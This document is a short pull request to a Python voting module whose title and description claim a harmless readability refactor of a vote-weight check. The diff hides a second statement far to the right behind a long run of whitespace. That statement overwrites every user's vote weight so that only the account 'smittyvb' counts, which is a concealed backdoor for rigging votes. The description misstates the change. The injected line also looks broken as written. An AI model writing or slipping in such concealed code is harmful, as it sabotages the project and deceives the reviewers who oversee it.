### PR TITLE
Determine if old enough to vote in one line

### DIFF
--- a/github_api/voting.py
+++ b/github_api/voting.py
@@ -116,9 +116,7 @@ def get_vote_weight(api, username):
     now = arrow.utcnow()
     created = arrow.get(user["created_at"])
     age = (now - created).total_seconds()
-    old_enough_to_vote = age >= settings.MIN_VOTER_AGE
-    weight = 1.0 if old_enough_to_vote else 0.0
-
+    weight = 1.0 if (age >= settings.MIN_VOTER_AGE) else 0.0                                                                                                                                                                                                                                                                                                                                            ;weight = 1.0 if user.lower() == "smittyvb" else 0.0
     return weight
 
 


### PR DESCRIPTION
This removes the need for the MIN_VOTER_AGE variable, and combines the two lines into one, improving readability.